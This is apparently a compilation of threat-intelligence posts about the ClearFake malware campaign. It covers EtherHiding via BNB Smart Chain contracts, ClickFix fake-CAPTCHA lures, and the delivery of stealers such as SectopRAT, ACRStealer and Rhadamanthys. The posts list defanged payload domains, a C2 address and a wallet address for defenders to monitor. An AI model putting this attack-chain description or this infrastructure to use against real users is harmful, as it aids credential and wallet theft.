Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet
Pulse ID: 6a1ff48f519a80c0b86c0280
Pulse Link: https://otx.alienvault.com/pulse/6a1ff48f519a80c0b86c0280
Pulse Author: Tr1sa111
Created: 2026-06-03 09:31:59
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CandC #ClearFake #CyberSecurity #InfoSec #OTX #OpenThreatExchange #bot #Tr1sa111
Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet
Threat actors exploited the EtherHiding technique to store ClearFake payload routing instructions within smart contracts on the BNB Smart Chain testnet, creating an immutable command-and-control infrastructure that cannot be taken down. The attack began with injected JavaScript on a compromised Swiss website that queried blockchain contracts to deliver malicious payloads. Victims passing anti-analysis checks were fingerprinted by operating system and routed to platform-specific ClickFix social engineering overlays. The campaign simultaneously deployed SectopRAT, a .NET-based remote access trojan capable of browser session hijacking, and ACRStealer, a C++ infostealer targeting credentials and cryptocurrency wallets. An on-chain execution tracker confirmed each compromise in real time. Four smart contracts shared a single deployer wallet, with the oldest deployed nearly a year before analysis, indicating a long-running, actively maintained operation.
Pulse ID: 6a15ba2632bd7e246e9c1250
Pulse Link: https://otx.alienvault.com/pulse/6a15ba2632bd7e246e9c1250
Pulse Author: AlienVault
Created: 2026-05-26 15:20:06
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BlockChain #Browser #CandC #ClearFake #CyberSecurity #EtherHiding #InfoSec #InfoStealer #Java #JavaScript #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SocialEngineering #Trojan #bot #cryptocurrency #AlienVault
TrendAI™ Research analyzed an intrusion where threat actors used the EtherHiding technique to route ClearFake payload delivery through smart contracts on the BNB Smart Chain testnet. The attack chain ended with two simultaneously deployed stealers, SectopRAT and ACRStealer alongside an on-chain execution tracker that confirmed each victim compromise in real time.
.ru serious? 🇷🇺 ccTLD .ru had an unbelievable +3741% ⏫ in #botnet C&C domains, placing it #1 for the most abused ccTLD in the latter half of 2025. This activity can be attributed almost entirely to #clearfake, a malicious JavaScript framework.
Learn more in the Botnet Threat Update Jul - Dec 2025 ⤵️ ⤵️
https://www.spamhaus.org/resource-hub/botnet-c-c/botnet-threat-update-july-to-december-2025/
Source et contexte: Expel (blog, Marcus Hutchins, 20 janv. 2026) publie une analyse technique de la campagne malware ClearFake/ClickFix, active sur des centaines de sites compromis et axée sur l’évasion défensive. • Ce que fait ClearFake: framework JavaScript malveillant injecté sur des sites piratés, affichant un faux CAPTCHA “ClickFix” qui incite l’utilisateur à faire Win+R puis à coller/valider une commande, déclenchant l’infection. La chaîne JS est obfusquée et prépare des charges ultérieures.
🚨 ClearFake Payload Delivery Domain Identified
A domain linked to ClearFake activity has been flagged delivering a js.clearfake payload with 100% confidence.
Quick Facts:
▪️Type: Domain
▪️Indicator: x5ust[.]windshift[.]ru
▪️Threat Type: Payload Delivery
▪️Malware: js.clearfake
▪️Date: 05 Dec 2025 // 00:17 UTC
▪️Tags: #ClearFake
▪️Reporter: threatcat_ch
URLScan:
▪️Verdict: 0
▪️Title: FASTPANEL
▪️Domain: https://urlscan.io/domain/x5ust.windshift.ru
▪️Result: https://urlscan.io/result/019aebe2-3c71-77ff-9e6d-5d225679e78a/
▪️Screenshot: https://urlscan.io/screenshots/019aebe2-3c71-77ff-9e6d-5d225679e78a.png
DNS / CT Data:
▪️A Records: 104.21.19.50, 172.67.185.61
▪️DNSlytics: https://dnslytics.com/domain/x5ust.windshift.ru
Related Intelligence:
▪️CRT: https://crt.sh/?q=x5ust.windshift.ru
▪️VirusTotal: https://www.virustotal.com/gui/domain/x5ust.windshift.ru
Here is our in-depth analysis of the latest #ClearFake variant using the Binance Smart Chain and two new ClickFix lures.
ClearFake is injected into thousands of compromised sites to distribute the #Emmental Loader, #Lumma, #Rhadamanthys, and #Vidar.
CTI tip: monitor transactions from the Ethereum address 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA to identify new PowerShell commands distributed by ClearFake - and block/detect any traffic to malicious domains!
As usual, feedback is greatly appreciated!
TDR analysts published an analysis of the new #ClearFake variant that relies on compromised websites injected with the malicious JavaScript framework, the #EtherHiding technique, and the #ClickFix social engineering tactic. https://blog.sekoia.io/clearfakes-new-widespread-variant-increased-web3-exploitation-for-malware-delivery/
TDR analysts published an analysis of the new #ClearFake variant that relies on compromised websites injected with the malicious JavaScript framework, the #EtherHiding technique, and the #ClickFix social engineering tactic.
#ClearFake variant is now spreading #Rhadamanthys Stealer via #Emmenhtal Loader.
cc @sekoia_io
1. ClearFake framework is injected on compromised WordPress and relies on EtherHiding
2. The #ClickFix lure uses a fake Cloudflare Turnstile with unusual web traffic
3. Malicious PowerShell command is copied into the user's clipboard data to be executed in the Run dialog box
4. Downloading Emmenhtal from:
bytes.microstorage.]shop (1st stage)
w66.discoverconicalcrouton.]shop (2nd stage)
5. Further downloading and executing Rhadamanthys from:
bytes.microstorage.]shop/code.bin (https://virustotal.com/gui/file/a88c153e1595f9d193b3f881ec77e0d7d338ae22c9f6e67ffdf39c3609fcdbf7)
6. Communicating with C2 at:
91.240.118.]2:9769
Public analysis of the recent ClearFake variant: https://security.szustak.pl/etherhide/etherhide.html
OTX Bot
The Threat Codex
The Spamhaus Project
CyberVeille.ch
Dark Web Informer 
crep1x
Sekoia.io